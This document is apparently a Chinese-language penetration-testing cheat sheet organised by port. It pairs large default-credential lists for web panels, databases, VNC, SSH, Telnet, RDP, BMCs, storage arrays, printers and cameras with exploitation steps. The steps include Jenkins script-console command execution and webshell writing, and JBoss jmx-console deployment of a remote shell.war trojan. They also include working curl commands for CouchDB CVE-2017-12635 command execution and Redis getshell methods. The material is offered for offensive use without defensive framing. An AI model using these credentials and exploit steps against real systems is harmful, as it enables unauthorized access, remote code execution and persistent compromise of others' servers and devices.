web类(web漏洞/敏感目录)

第三方通用组件漏洞struts thinkphp jboss ganglia zabbix
80 web
80-89 web
8000-9090 web

acti (web)  admin  12345
acti (web)  admin  123456
acti (web)  Admin  12345
acti (web)  Admin  123456
avigilon (web)  admin  admin
avigilon (web)  Administrator  
basler (web)  admin  admin
grandstream (web)  admin  admin
siemens (web)  admin  admin
vacron (web)  admin  admin
american_dynamics (web)  admin  admin
american_dynamics (web)  admin  9999
avtech (web)  admin  admin
brickcom (web)  admin  admin
iqinvision (web)  root  system
mobotix (web)  admin  meinsm
samsung (web)  admin  1111111
samsung (web)  admin  4321
samsung (web)  root  admin
speco (web)  admin  1234
videoiq (web)  supervisor  supervisor
arecont (web)  admin  
arecont (web)    
canon (web)  root  camera
geovision (web)  admin  admin
honeywell (web)  admin  1234
jvc (web)  admin  jvc
sentry360 (web)  admin  1234
stardot (web)  admin  admin
XAMPP (web)  newuser  wampp
Konica Minolta (web)    0000
Konica Minolta (web)    1234
Konica Minolta (web)    
Konica Minolta (web)    MagiMFP
Konica Minolta (web)    sysAdmin
Konica Minolta (web)  <N/A>  0
Konica Minolta (web)  <N/A>  sysadm
Konica Minolta (web)  admin  administrator
SAP (web)  Administrator  manage
SAP (web)  DDIC  19920706
SAP (web)  Developer  isdev
SAP (web)  EARLYWATCH  SUPPORT
SAP (web)  Replicator  iscopy
SAP (web)  SAP*  06071992
SAP (web)  SAP*  7061992
SAP (web)  SAP*  PASS
SAP (web)  SAPCPIC  ADMIN
SAP (web)  SAPCPIC  admin
SAP (web)  SAPR3  SAP
SAP (web)  TMSADM  
SAP (web)  admin  axis2
SAP (web) client EARLYWATCH  admin  Support
SAP (web)  ctb_admin  sap123
SAP (web)  itsadmin  init
SAP (web)  xmi_demo  sap123
Ubiquiti EdgeOS (web)  ubnt  ubnt
CA APM Team Center (web)  Admin  
CA APM Team Center (web)  Guest  Guest
CA NetQoS (web)  nqadmin  nq
CA NetQoS (web)  nquser  nq
AudioCodes Mediant 1000 (web)  Admin  Admin
ActiveMQ (general)  admin  admin
ActiveMQ (general)    
Kanboard (web)  admin  admin
IBM UrbanCode Deploy (web)  admin  admin
IBM UrbanCode Deploy (web)  ucdpadmin  ucdpadmin
JBoss AS 6 Alt (web)  admin  admin
Odoo (general)  admin  admin
Odoo (general)  demo  demo
Teleopti WFM (web)  admin@company.com  admin
Endpoint Protector (general)  root  epp2011
NetBackup OpsCenter Analytics (web)  admin  password
Dynatrace (web)  admin  admin
Jenkins (web)    
Zabbix (web)  Admin  zabbix
DataStax OpsCenter 6.0.x (web)  admin  admin
JBoss AS 6 (web)  admin  admin
IBM Netezza (web)  admin  password
Dell iDRAC (web)  root  calvin
APC Network Management Card (web)  apc  apc
APC Network Management Card (web)  device  apc
APC Network Management Card (web)  readonly  apc
WebSphere (web)  system  manager
Apache Tomcat Host Manager (web)  tomcat  tomcat
Apache Tomcat Host Manager (web)  admin  admin
Apache Tomcat Host Manager (web)  ovwebusr  OvW*busr1
Apache Tomcat Host Manager (web)  j2deployer  j2deployer
Apache Tomcat Host Manager (web)  cxsdk  kdsxc
Apache Tomcat Host Manager (web)  ADMIN  ADMIN
Apache Tomcat Host Manager (web)  xampp  xampp
Apache Tomcat Host Manager (web)  tomcat  s3cret
Apache Tomcat Host Manager (web)  QCC  QLogic66
Apache Tomcat Host Manager (web)  admin  None
Apache Tomcat Host Manager (web)  admin  tomcat
Apache Tomcat Host Manager (web)  root  root
Apache Tomcat Host Manager (web)  role1  role1
Apache Tomcat Host Manager (web)  role  changethis
Apache Tomcat Host Manager (web)  tomcat  changethis
Apache Tomcat Host Manager (web)  admin  j5Brn9
Apache Tomcat Host Manager (web)  role1  tomcat
Nuxeo Server (general)  Administrator  Administrator
Oracle Glassfish (web)  admin  admin
Oracle Glassfish (web)  admin  
Cisco Systems (general)  cisco  cisco
IBM IMM (web)  USERID  PASSW0RD
Avaya Contact Center (web)  webadmin  webadmin
Video Web Server (webcam)  admin  admin
SonarQube (web)  admin  admin
Supermicro (web)  ADMIN  ADMIN
Nexus Repository Manager (web)  admin  admin123
Cisco Collaboration Endpoint (general)  cisco  admin
TeamCity 9 Guest (web)    
Haivision Makito X Decoder (web)  admin  manager
HP Server Automation (web)  Administrator  admin
HP Server Automation (web)  admin  opsware_admin
JasperReports (web)  jasperadmin  jasperadmin
JasperReports (web)  jasperadmin  bitnami
Nortel Integrated Call Director (web)  admin  admin
Elasticsearch (web)    
elasticsearch (web)  elastic  changeme
Aruba (web)  admin  admin

Jenkins未授权访问:

Jenkins面板http://ip:8080/manage

println "whoami".execute().text 命令执行
new File ("/var/www/html/shell.php").write('<?php phpinfo(); ?>'); 写webshell

JBOSS未授权访问

http://ip:8080/jmx-console未授权访问(或默认密码admin/admin)

点击JMX CONSOLE未授权访问
点击jboss.deployment中的deploymentScanner进入应用部署页面
使用apache搭建远程木马服务器shell.war
addurl-java.lang.String配置访问木马地址http://<ip>/shell.war
访问http://ip:8080/shell/

数据库类(扫描弱口令)

1433 MSSQL

Bosch RPS (mssql)  sa  RPSsql12345
medo.check (mssql)  mcUser  medocheck123
Lenel OnGuard (mssql)  LENEL  MULTIMEDIA
UTC FCWnx (mssql)  sa  SecurityMaster08
Telestream Vantage (mssql)  sa  vantage12!
Video Insight (mssql)  sa  V4in$ight
Micro Focus Silk Central (mssql)  sa  SilkCentral12!34
MSSQL (mssql)  sa  
MSSQL (mssql)  sa  sa
MSSQL (mssql)  sa  Password123
MSSQL (mssql)  sa  password
MSSQL (mssql)  ADONI  BPMS
MSSQL (mssql)  sa  sqlserver
Schlage SMS (mssql)  sa  SECAdmin1
Schlage SMS (mssql)  SMSAdmin  SECAdmin1
Wonderware Historian (mssql)  aaAdmin  pwAdmin
Wonderware Historian (mssql)  aaPower  pwPower
Wonderware Historian (mssql)  aaUser  pwUser
Wonderware Historian (mssql)  aadbo  pwddbo
Wonderware Historian (mssql)  wwUser  wwUser
Wonderware Historian (mssql)  wwPower  wwPower
Wonderware Historian (mssql)  wwAdmin  wwAdmin
Wonderware Historian (mssql)  wwdbo  wwdbo
SplendidCRM (mssql)  sa  splendidcrm2005
MediaPortal (mssql)  sa  M3d!aP0rtal
i2b2 Workbench (mssql)  I2b2metadata  i2b2metadata
i2b2 Workbench (mssql)  I2b2demodata  i2b2demodata
i2b2 Workbench (mssql)  I2b2workdata  i2b2workdata
i2b2 Workbench (mssql)  I2b2metadata2  i2b2metadata2
i2b2 Workbench (mssql)  I2b2demodata2  i2b2demodata2
i2b2 Workbench (mssql)  I2b2workdata2  i2b2workdata2
i2b2 Workbench (mssql)  I2b2hive  i2b2hive
Emerson AMS (mssql)  sa  42Emerson42Eme
NetXMS (mssql)  admin  netxms
Aris (mssql)  ARIS9  *ARIS!1dm9n#
easyWinArt (mssql)  sa  $easyWinArt4
SafeNet Sentinel EMS (mssql)  sa  DBA!sa@EMSDB123
IHS Kingdom (mssql)  sa  $ei$micMicro
Napco Continental Access (mssql)  sa  cic
Napco Continental Access (mssql)  cic  cic
Napco Continental Access (mssql)  sa  cic!23456789
Napco Continental Access (mssql)  cic  cic!23456789
Napco Continental Access (mssql)  sa  Cic!23456789
Napco Continental Access (mssql)  cic  Cic!23456789
IBM WAS (mssql)  wasadmin  wasadmin
OpenGTS (mssql)  gts  opengts
WelchAllyn CardioPerfect (mssql)  sa  Cardio.Perfect
TimeForce (mssql)  sa  Dr8gedog
TimeForce (mssql)  sa  dr8gedog
GeoNetwork (mssql)  admin  gnos
Lasa AIMS (mssql)  ADMIN  AIMS
Lasa AIMS (mssql)  FB  AIMS
CCH (mssql)  sa  PracticeUser1
IBM Maximo (mssql)  maxadmin  maxadmin
IBM Maximo (mssql)  mxintadm  mxintadm
IBM Maximo (mssql)  maxreg  maxreg
SKF @ptitude Analyst (mssql)  sa  skf_admin1

1521 Oracle

Oracle  <N/A>  
Oracle  ADAMS  WOOD
Oracle  ADLDEMO  ADLDEMO
Oracle  ADMIN  JETSPEED
Oracle  ADMIN  WELCOME
Oracle  ADMINISTRATOR  ADMINISTRATOR
Oracle  ADMINISTRATOR  admin
Oracle  ANDY  SWORDFISH
Oracle  AP  AP
Oracle  APPLSYS  APPLSYS
Oracle  APPLSYS  FND
Oracle  APPLSYSPUB  FNDPUB
Oracle  APPS  APPS
Oracle  APPUSER  APPUSER
Oracle  AQ  AQ
Oracle  AQDEMO  AQDEMO
Oracle  AQJAVA  AQJAVA
Oracle  AQUSER  AQUSER
Oracle  AUDIOUSER  AUDIOUSER
Oracle  AURORA$JIS$UTILITY$  
Oracle  AURORA$ORB$UNAUTHENTICATED  INVALID
Oracle  AURORA@ORB@UNAUTHENTICATED  INVALID
Oracle  BC4J  BC4J
Oracle  BLAKE  PAPER
Oracle  BRIO_ADMIN  BRIO_ADMIN
Oracle  CATALOG  CATALOG
Oracle  CDEMO82  CDEMO82
Oracle  CDEMOCOR  CDEMOCOR
Oracle  CDEMORID  CDEMORID
Oracle  CDEMOUCB  CDEMOUCB
Oracle  CENTRA  CENTRA
Oracle  CIDS  CIDS
Oracle  CIS  CIS
Oracle  CISINFO  CISINFO
Oracle  CLARK  CLOTH
Oracle  COMPANY  COMPANY
Oracle  COMPIERE  COMPIERE
Oracle  CQSCHEMAUSER  PASSWORD
Oracle  CSMIG  CSMIG
Oracle  CTXDEMO  CTXDEMO
Oracle  CTXSYS  
Oracle  CTXSYS  CTXSYS
Oracle  DBI  MUMBLEFRATZ
Oracle  DBSNMP  DBSNMP
Oracle  DEMO  DEMO
Oracle  DEMO8  DEMO8
Oracle  DEMO9  DEMO9
Oracle  DES  DES
Oracle  DEV2000_DEMOS  DEV2000_DEMOS
Oracle  DIP  DIP
Oracle  DISCOVERER_ADMIN  DISCOVERER_ADMIN
Oracle  DSGATEWAY  DSGATEWAY
Oracle  DSSYS  DSSYS
Oracle  EJSADMIN  EJSADMIN
Oracle  EMP  EMP
Oracle  ESTOREUSER  ESTORE
Oracle  EVENT  EVENT
Oracle  EXFSYS  EXFSYS
Oracle  FINANCE  FINANCE
Oracle  FND  FND
Oracle  FROSTY  SNOWMAN
Oracle  GL  GL
Oracle  GPFD  GPFD
Oracle  GPLD  GPLD
Oracle  HCPARK  HCPARK
Oracle  HLW  HLW
Oracle  HR  HR
Oracle  IMAGEUSER  IMAGEUSER
Oracle  IMEDIA  IMEDIA
Oracle  JMUSER  JMUSER
Oracle  JONES  STEEL
Oracle  JWARD  AIROPLANE
Oracle  L2LDEMO  L2LDEMO
Oracle  LBACSYS  LBACSYS
Oracle  LIBRARIAN  SHELVES
Oracle  MASTER  PASSWORD
Oracle  MDDEMO  MDDEMO
Oracle  MDDEMO_CLERK  CLERK
Oracle  MDDEMO_MGR  MGR
Oracle  MDSYS  MDSYS
Oracle  MFG  MFG
Oracle  MGWUSER  MGWUSER
Oracle  MIGRATE  MIGRATE
Oracle  MILLER  MILLER
Oracle  MMO2  MMO2
Oracle  MODTEST  YES
Oracle  MOREAU  MOREAU
Oracle  MTSSYS  MTSSYS
Oracle  MTS_USER  MTS_PASSWORD
Oracle  MTYSYS  MTYSYS
Oracle  MXAGENT  MXAGENT
Oracle  NAMES  NAMES
Oracle  OAS_PUBLIC  OAS_PUBLIC
Oracle  OCITEST  OCITEST
Oracle  ODM  ODM
Oracle  ODM_MTR  MTRPW
Oracle  ODS  ODS
Oracle  ODSCOMMON  ODSCOMMON
Oracle  OE  OE
Oracle  OEMADM  OEMADM
Oracle  OEMREP  OEMREP
Oracle  OLAPDBA  OLAPDBA
Oracle  OLAPSVR  INSTANCE
Oracle  OLAPSYS  MANAGER
Oracle  OMWB_EMULATION  ORACLE
Oracle  OO  OO
Oracle  OPENSPIRIT  OPENSPIRIT
Oracle  ORACACHE  (random password)
Oracle  ORAREGSYS  ORAREGSYS
Oracle  ORASSO  ORASSO
Oracle  ORDPLUGINS  ORDPLUGINS
Oracle  ORDSYS  ORDSYS
Oracle  OSE$HTTP$ADMIN  (random password)
Oracle  OSP22  OSP22
Oracle  OUTLN  OUTLN
Oracle  OWA  OWA
Oracle  OWA_PUBLIC  OWA_PUBLIC
Oracle  OWNER  OWNER
Oracle  PANAMA  PANAMA
Oracle  PATROL  PATROL
Oracle  PERFSTAT  PERFSTAT
Oracle  PLEX  PLEX
Oracle  PLSQL  SUPERSECRET
Oracle  PM  PM
Oracle  PO  PO
Oracle  PO7  PO7
Oracle  PO8  PO8
Oracle  PORTAL30  PORTAL30
Oracle  PORTAL30  PORTAL31
Oracle  PORTAL30_DEMO  PORTAL30_DEMO
Oracle  PORTAL30_PUBLIC  PORTAL30_PUBLIC
Oracle  PORTAL30_SSO  PORTAL30_SSO
Oracle  PORTAL30_SSO_PS  PORTAL30_SSO_PS
Oracle  PORTAL30_SSO_PUBLIC  PORTAL30_SSO_PUBLIC
Oracle  POWERCARTUSER  POWERCARTUSER
Oracle  PRIMARY  PRIMARY
Oracle  PUBSUB  PUBSUB
Oracle  PUBSUB1  PUBSUB1
Oracle  QDBA  QDBA
Oracle  QS  QS
Oracle  QS_ADM  QS_ADM
Oracle  QS_CB  QS_CB
Oracle  QS_CBADM  QS_CBADM
Oracle  QS_CS  QS_CS
Oracle  QS_ES  QS_ES
Oracle  QS_OS  QS_OS
Oracle  QS_WS  QS_WS
Oracle  RE  RE
Oracle  REPADMIN  REPADMIN
Oracle  REPORTS_USER  OEM_TEMP
Oracle  REP_MANAGER  DEMO
Oracle  REP_OWNER  DEMO
Oracle  REP_OWNER  REP_OWNER
Oracle  RMAIL  RMAIL
Oracle  RMAN  RMAN
Oracle  SAMPLE  SAMPLE
Oracle  SAP  SAPR3
Oracle  SCOTT  TIGER
Oracle  SDOS_ICSAP  SDOS_ICSAP
Oracle  SECDEMO  SECDEMO
Oracle  SERVICECONSUMER1  SERVICECONSUMER1
Oracle  SH  SH
Oracle  SITEMINDER  SITEMINDER
Oracle  SLIDE  SLIDEPW
Oracle  STARTER  STARTER
Oracle  STRAT_USER  STRAT_PASSWD
Oracle  SWPRO  SWPRO
Oracle  SWUSER  SWUSER
Oracle  SYMPA  SYMPA
Oracle  SYS  CHANGE_ON_INSTALL
Oracle  SYS  D_SYSPW
Oracle  SYSADM  SYSADM
Oracle  SYSMAN  OEM_TEMP
Oracle  SYSMAN  oem_temp
Oracle  SYSTEM  D_SYSTPW
Oracle  SYSTEM  MANAGER
Oracle  TAHITI  TAHITI
Oracle  TDOS_ICSAP  TDOS_ICSAP
Oracle  TESTPILOT  TESTPILOT
Oracle  TRACESRV  TRACE
Oracle  TRACESVR  TRACE
Oracle  TRAVEL  TRAVEL
Oracle  TSDEV  TSDEV
Oracle  TSUSER  TSUSER
Oracle  TURBINE  TURBINE
Oracle  ULTIMATE  ULTIMATE
Oracle  USER  USER
Oracle  USER0  USER0
Oracle  USER1  USER1
Oracle  USER2  USER2
Oracle  USER3  USER3
Oracle  USER4  USER4
Oracle  USER5  USER5
Oracle  USER6  USER6
Oracle  USER7  USER7
Oracle  USER8  USER8
Oracle  USER9  USER9
Oracle  UTLBSTATU  UTLESTAT
Oracle  VIDEOUSER  VIDEO USER
Oracle  VIF_DEVELOPER  VIF_DEV_PWD
Oracle  VIRUSER  VIRUSER
Oracle  VRR1  VRR1
Oracle  WEBCAL01  WEBCAL01
Oracle  WEBDB  WEBDB
Oracle  WEBREAD  WEBREAD
Oracle  WKSYS  WKSYS
Oracle  WWW  WWW
Oracle  WWWUSER  WWWUSER
Oracle  XPRT  XPRT
Oracle  admin  admin
Oracle  admin  adminadmin
Oracle  admin  security
Oracle  admin  welcome
Oracle  bpel  bpel
Oracle  cn=orcladmin  welcome
Oracle  demo  demo
Oracle  ilom-admin  ilom-admin
Oracle  ilom-operator  ilom-operator
Oracle  internal  oracle
Oracle  joe  password
Oracle  mary  password
Oracle  nm2user  nm2user
Oracle  oracle  oracle
Oracle  scott  tiger or tigger
Oracle  siteadmin  siteadmin
Oracle  sys  change_on_install
Oracle  sys  sys
Oracle  system  manager
Oracle  system  password
Oracle  system  security
Oracle  system/manager  sys/change_on_install
Oracle  webdb  webdb
Oracle  weblogic  weblogic
Oracle  wlcsystem  wlcsystem
Oracle  wlpisystem  wlpisystem

3306 MySQL
5432 PostgreSQL

postgres (postgres)  postgres  postgres
postgres (postgres)  dcmadmin  passw0rd
postgres (postgres)  postgres  amber
postgres (postgres)  postgres  postgres
postgres (postgres)  postgres  password
postgres (postgres)  postgres  admin
postgres (postgres)  admin  admin
postgres (postgres)  admin  password
postgres (postgres)  postgres  123

6379 Redis未授权
可通过四种方式getshell:写webshell、写crontabs、写ssh公钥、Redis主从复制(4.x,5.x)
工具:Redis-cli,fofa:protocol=redis

Redis (redis)  None  None

特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血
873 Rsync未授权
2049 nfs

# 配置不当时,可以远程挂载nfs的共享目录
apt install nfs-common 安装nfs客户端
showmount -e xx.xx.xx.xx 查看nfs服务器上的共享目录
mount -t nfs xx.xx.xx.xx:/grdata /mnt 挂载到本地
umount /mnt 卸载目录

2181,2182 ZooKeeper未授权访问
2375 Docker的Web未授权访问

通过访问ip:2375/version验证,有可能造成执行目标服务器容器命令如container、image等

5984 CouchDB未授权访问

http://xxx:5984/_utils/
通过页面创建管理员用户,并通过put方式远程代码执行(CVE-2017-12635)

curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/vultest'
curl -X PUT 'http://admin:admin@xx.xx.xx.xx:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://admin:admin@xx.xx.xx.xx:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

5900-5905 VNC常见端口

vnc (vnc)    123456
vnc (vnc)    FELDTECH_VNC
vnc (vnc)    vnc_pcc
vnc (vnc)    elux
vnc (vnc)    Passwort
vnc (vnc)    visam
vnc (vnc)    password
vnc (vnc)    Amx1234!
vnc (vnc)    1988
vnc (vnc)    admin
vnc (vnc)    Vision2
vnc (vnc)    ADMIN
vnc (vnc)    TOUCHLON
vnc (vnc)    EltakoFVS
vnc (vnc)    Wyse#123
vnc (vnc)    muster
vnc (vnc)    passwd11
vnc (vnc)    qwasyx21
vnc (vnc)    Administrator
vnc (vnc)    ripnas
vnc (vnc)    eyevis
vnc (vnc)    fidel123
vnc (vnc)    Admin#1
vnc (vnc)    default
vnc (vnc)    sigmatek
vnc (vnc)    hapero
vnc (vnc)    1234
vnc (vnc)    pass
vnc (vnc)    raspberry
vnc (vnc)    user
vnc (vnc)    solarfocus
vnc (vnc)    AVStumpfl
vnc (vnc)    m9ff.QW
vnc (vnc)    maryland-dstar
vnc (vnc)    pass1
vnc (vnc)    pass2
vnc (vnc)    instrument
vnc (vnc)    beijer
vnc (vnc)    vnc
vnc (vnc)    yesco
vnc (vnc)    protech
vnc (vnc)    Wyse

7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞

http://ip:9200/_plugin/head/  # web管理界面
http://ip:9200/_cat/indices  # 查看集群当前状态
http://ip:9200/_nodes  # 查看节点数据
http://ip:9200/_river/_search  # 查看数据库敏感信息

11211 memcached未授权访问

telnet ip 11211 或 nc -vv <target> 11211
无需用户名密码,可以直接连接memcache服务的11211端口
stats # 查看memcache服务状态

27017,27018 Mongodb未授权访问
利用工具:Navicat,Robo3T
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

常用端口类(扫描弱口令/端口爆破)

21 FTP
22 SSH

movistar (ssh)  admin  admin
movistar (ssh)  1234  1234
netsys (ssh)  admin  admin
Zebra  admin  1234
zoom  admin  zoomadsl
technicolor (ssh)  admin  admin
ubiquiti (ssh)  admin  admin
ubiquiti (ssh)  root  ubnt
ubiquiti (ssh)  ubnt  ubnt
thomson (ssh)  admin  admin
thomson (ssh)  admin  password
3com (ssh)  admin  admin
topnet (web)  topadmin  topadmin
orange livebox4 (web)  admin  
orange livebox4 (web)  admin  (blank)
asus (ssh)  admin  admin
asus (ssh)  admin  password
asus (ssh)  root  root
asus (ssh)  Admin  Admin
billion (ssh)  admin  admin
huawei (ssh)  admin  admin
huawei (ssh)  admin  
huawei (ssh)  Admin  admin
huawei (ssh)  user  user
huawei (ssh)  vodafone  vodafone
huawei (ssh)  user  HuaweiUser
huawei (ssh)  telecomadmin  admintelecom
huawei (ssh)  digicel  digicel
juniper (ssh)  admin  abc123
juniper (ssh)  super  juniper123
juniper (ssh)  admin  <<< %s(un='%s') = %u.
Juniper (ssh)  admin  abc123
Juniper (ssh)  admin  netscreen
Juniper (ssh)  admin  peribit
Juniper (ssh)  netscreen  netscreen
Juniper (ssh)  redline  redline
Juniper (ssh)  serial#  serial#
RedHat (ssh)    AMIAMI
RedHat (ssh)    AMIDECOD
RedHat (ssh)  admin  admin
RedHat (ssh)  piranha  piranha
RedHat (ssh)  piranha  q
Cisco (ssh)  cisco  cisco
Cisco (ssh)  pix  cisco
Cisco Aironet (ssh)  Cisco  Cisco
raspberry Pi (ssh)  pi  raspberry
Apple Jailbroken Device (ssh)  root  alpine
Apple Jailbroken Device (ssh)  root  dottie
ssh (ssh)  root  7ujMko0admin
ssh (ssh)  nasadmin  nasadmin
ssh (ssh)  root  ascend
IBM Storwize V7000 Unified (ssh)  admin  admin0001
IBM Storwize V7000 Unified (ssh)  superuser  passw0rd
IBM Storwize V7000 Unified (ssh)  root  Passw0rd
modern.ie (ssh)  IEUser  D@rj33l1ng
HipChat Server (ssh)  admin  hipchat
AT&T Arris NVG589 & NVG599 (SharknAT&To) (ssh)  remotessh  5SaP9I26
antsle (ssh)  root  antsle
MySQL (ssh)  root  root
metasploit (ssh)  msf  msf
metasploit (ssh)  msfdev  msfdev

23 Telnet

telnet (telnet)  root  password
telnet (telnet)  root  root
telnet (telnet)  root  xc3511
telnet (telnet)  root  vizxv
telnet (telnet)  root  admin
telnet (telnet)  admin  admin
telnet (telnet)  root  888888
telnet (telnet)  root  xmhdipc
telnet (telnet)  root  default
telnet (telnet)  root  juantech
telnet (telnet)  root  123456
telnet (telnet)  root  54321
telnet (telnet)  support  support
telnet (telnet)  root  None
telnet (telnet)  admin  password
telnet (telnet)  root  12345
telnet (telnet)  user  user
telnet (telnet)  admin  None
telnet (telnet)  root  pass
telnet (telnet)  admin  admin1234
telnet (telnet)  root  1111
telnet (telnet)  admin  smcadmin
telnet (telnet)  admin  1111
telnet (telnet)  root  666666
telnet (telnet)  root  1234
telnet (telnet)  root  klv123
telnet (telnet)  Administrator  admin
telnet (telnet)  service  service
telnet (telnet)  supervisor  supervisor
telnet (telnet)  guest  guest
telnet (telnet)  guest  12345
telnet (telnet)  guest  12345
telnet (telnet)  admin1  password
telnet (telnet)  administrator  1234
telnet (telnet)  666666  666666
telnet (telnet)  888888  888888
telnet (telnet)  ubnt  ubnt
telnet (telnet)  root  klv1234
telnet (telnet)  root  Zte521
telnet (telnet)  root  hi3518
telnet (telnet)  root  jvbzd
telnet (telnet)  root  anko
telnet (telnet)  root  zlxx.
telnet (telnet)  root  7ujMko0vizxv
telnet (telnet)  root  7ujMko0admin
telnet (telnet)  root  system
telnet (telnet)  root  ikwb
telnet (telnet)  root  dreambox
telnet (telnet)  root  user
telnet (telnet)  root  realtek
telnet (telnet)  root  0
telnet (telnet)  admin  1111111
telnet (telnet)  admin  1234
telnet (telnet)  admin  12345
telnet (telnet)  admin  54321
telnet (telnet)  admin  123456
telnet (telnet)  admin  7ujMko0admin
telnet (telnet)  admin  1234
telnet (telnet)  admin  pass
telnet (telnet)  admin  meinsm
telnet (telnet)  tech  tech
telnet (telnet)  mother  fucker
Duhua (telnet)  root  7ujMko0admin
Duhua (telnet)  admin  7ujMko0admin
Duhua (telnet)  root  vizxv
Juniper ScreenOS/Netscreen (telnet)  netscreen  <<< %s(un='%s') = %u
American Dynamics EDVR (telnet)  admin  9999

2601,2604 zebra路由,默认密码zebra
3389 RDP远程桌面

windows (RDP)  Administrator  FELDTECH
windows (RDP)  secure  SecurityMaster08
windows (RDP)  admin  trinity
windows (RDP)  administrator  Wyse#123
windows (RDP)  user  Wyse#123
windows (RDP)  admin  admin
windows (RDP)  Administrator  Administrator
windows (RDP)  sonos  sonos
windows (RDP)  demo  m9ff.QW
windows (RDP)  wasadmin  wasadmin
windows (RDP)  maxadmin  maxadmin
windows (RDP)  mxintadm  mxintadm
windows (RDP)  maxreg  maxreg
windows (RDP)  root  
windows (RDP)  admin  admin
windows (RDP)  admin  12345
windows (RDP)  admin  1234
windows (RDP)  admin  123456
windows (RDP)  instrument  instrument
windows (RDP)  admin  
windows (RDP)  nmt  1234
windows (RDP)  admin  password
windows (RDP)  IEUser  Passw0rd!
windows (RDP)  openhabian  openhabian
windows (RDP)  vagrant  vagrant
windows (RDP)  Administrator  vagrant
windows (RDP)  john  Password123!

服务器带外管理默认口令

1、宝德4卡服务器
默认用户名:ADMIN/密码:11111111

2、超微服务器
默认用户名:ADMIN/密码:admin000
默认用户名:ADMIN/密码:ADMIN

3、浪潮服务器
型号:NF5270M4 管理地址:手动配置
默认用户名:admin/密码:admin
型号:NF5270M2 管理里地址:192.168.1.100
默认用户名:admin/密码:admin
浪潮管理口:IPMI
默认用户/密码:admin/admin
浪潮AS5300/5500 默认IP:192.168.1.1
管理软件登录用户名默认,密码为root
浏览器登录用户名默认,密码为空
浪潮AS5600 默认IP:192.168.1.1
浏览器登录默认用户名:superuser 密码:passw0rd

4、IBM服务器
IBM P小型机ASMI 管理地址:hmc1:192.168.2.147
用户名:admin/密码:admin
管理地址:hmc1:192.168.3.147
用户名:admin/密码:admin
IBM X系列MM端口 管理地址:192.168.70.125/25
用户名:USERID/密码:PASSW0RD
IBM管理口:IMM
RD系列lenovo/len0vO
默认地址:192.168.70.125
默认用户/密码:USERID/PASSW0RD

5、华为服务器
E6000 系列 管理地址:10.10.1.101-10.10.1.110
用户名:root /密码:Huawei12#$
RH2288 v3 系列 管理地址:192.168.2.100
用户名:root /密码:Huawei12#$
RH2288 v5系列 管理地址:192.168.2.100
用户名:Administrator /密码:Admin@9000
T600 系列 管理地址:10.10.1.101-10.10.1.102
用户名:root /密码:Huawei12#$
X6000系列 管理地址:10.10.1.101-10.10.1.104
用户名:root /密码:Huawei12#$
V3服务器BIOS系统的默认密码为:“Huawei12#$”
V5服务器BIOS系统的默认密码为:“Admin@9000”。
BIOS系统只能修改默认iBMC用户的密码。V3服务器的iBMC默认用户为root,默认密码为Huawei12#$;V5服务器的iBMC默认用户为Administrator,默认密码为Admin@9000。

6、H3C服务器
R4900-G2系列 管理地址:192.168.1.2/24
用户名:admin /密码:Password@_

7、Dell服务器
IDRAC系列 管理地址:192.168.0.120
用户名:root /密码:calvin
DELL服务器管理口:idac
默认账号:root
密码:calvin
IP:192.168.0.120

8、联想服务器
RQ940系列 管理地址:192.168.0.120
用户名:lenovo /密码:len0vO
RD530/RD630/RD540/RD640 管理地址:手动配置
用户名:lenovo /密码:lenovo
万全R520系列 管理地址:手动该设置
用户名:lenovo /密码:lenovo
联想服务器管理口
联想 thinkserver RQ940
管理口IP192.168.0.120
账户/密码:admin/admin

9、曙光服务器
I840-G25系列 管理地址:手动设置
用户名:admin /密码:administrator
10、HP服务器
HP管理口:ILO
默认用户/密码:Administrator/password
HP以前管理口登陆MP卡
通过网线连接MP卡的RJ-45口,通过telnet方式登录,默认用户/密码:Admin/Admin

rd350
IP:192.168.70.125
账号密码:USERID/PASSW0RD

存储默认管理

1、IBM存储
DS存储 port1 A控192.168.128.101/24

2、华为存储
OceanStor 5300 V3/5500 V3(V300R003C00/V300R003C10版本)
A管理口地址:192.168.128.101/24
用户名:admin /密码:Admin@storage
B管理口地址:192.168.128.102/24
OceanStor 5300 V3/5500 V3(V300R003C20版本)
A管理口:192.168.128.101/16
B管理口:192.168.128.102/16
用户名:admin /密码:Admin@storage
OceanStor 5600 V3/5800 V3/6800 V3(V300R003C00/V300R003C10版本)
A管理口:192.168.128.101/16
B管理口:192.168.128.102/16
用户名:admin /密码:Admin@storage
OceanStor 5600 V3/5800 V3/6800 V3(V300R003C20版本)
A管理口:192.168.128.101/16
B管理口:192.168.128.102/16
用户名:admin /密码:Admin@storage
以上默认的内部心跳IP 双控:127.127.127.10-11/24
四控:127.127.127.10-13/24
以上维护网口IP 172.31.128.101/16
172.31.128.102/16

3、华赛存储
S1200系列 默认管理地址:192.168.168.1
用户名:root /密码:password
V1000/S500系列 默认管理地址:192.168.128.101-102/24
用户名:admin /密码:123456

4、Dell存储
MD3600系列 默认管理地址:192.168.128.101/102
连接方式:用DELL MDSM软件连接

5、联想EMC
5100系列 默认管理地址:1.1.1.1/1.1.1.2
用户名:root /密码:lenovo

6、曙光存储
DS800-G35系列 默认地址:192.168.0.210/192.168.0.220
用户名:admin /密码:admin

7、宏杉存储
MS系列 默认地址:192.168.0.210/192.168.0.220
用户名:admin /密码:admin

8、同有存储
NetStor iSUM450G2系列 默认地址:192.168.0.200
用户名:administator /密码:password

打印机

XEROX Phaser 6700 (printer)  admin  1111
HP LaserJet 600 (printer)    
Xerox WorkCentre 5020/DN (printer)  11111  
HP LaserJet No Password Legacy (printer)    
Ricoh MP (printer)  supervisor  
HP LaserJet No Password (printer)    
Brother HL Series (printer)  admin  access

手机

Polycom VVX 500 (phone)  User  123
Polycom VVX 500 (phone)  Admin  456

相机

icatch (camera)  admin  123456
icatch (camera)  root  icatch99
Speco Technologies IP Camera (camera)  admin  1234